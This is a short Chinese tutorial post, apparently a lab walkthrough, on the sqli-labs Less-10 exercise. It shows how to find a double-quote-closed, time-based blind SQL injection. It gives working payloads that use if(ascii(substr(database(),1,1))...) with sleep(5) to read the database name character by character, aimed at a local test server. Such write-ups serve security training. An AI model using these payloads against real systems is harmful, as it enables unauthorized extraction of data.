GET-Blind-Time based-double quotes(基于双引号的盲注) Less-10

首先我们可以看一下主页

我们试一下看,

有了前面几关的基础后我们可以这样试一下 http://127.0.0.1/Less-10/?id=1'  and if(ascii(substr(database(),1,1))>115, 0, sleep(5)) %23   然后发现返回的页面

在试一下 http://127.0.0.1/Less-10/?id=1'  and if(ascii(substr(database(),1,1))>114, 0, sleep(5)) %23

我们发现,无论怎样测试返回的都是这样,然后我们就可以猜测是不是基于时间的盲注,

可以看到时间并没有延迟,然后可以猜测是基于双引号的

这样我们看到有延迟出现,说明是双引号闭合

id=1" and if(ascii(substr(database(),1,1))=115,sleep(5),null)%23

http://localhost/sqli-labs/Less-10/?id=1" and if(ascii(substr(database(),1,1))>114, 0, sleep(5)) %23

这时又不会有延迟了

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值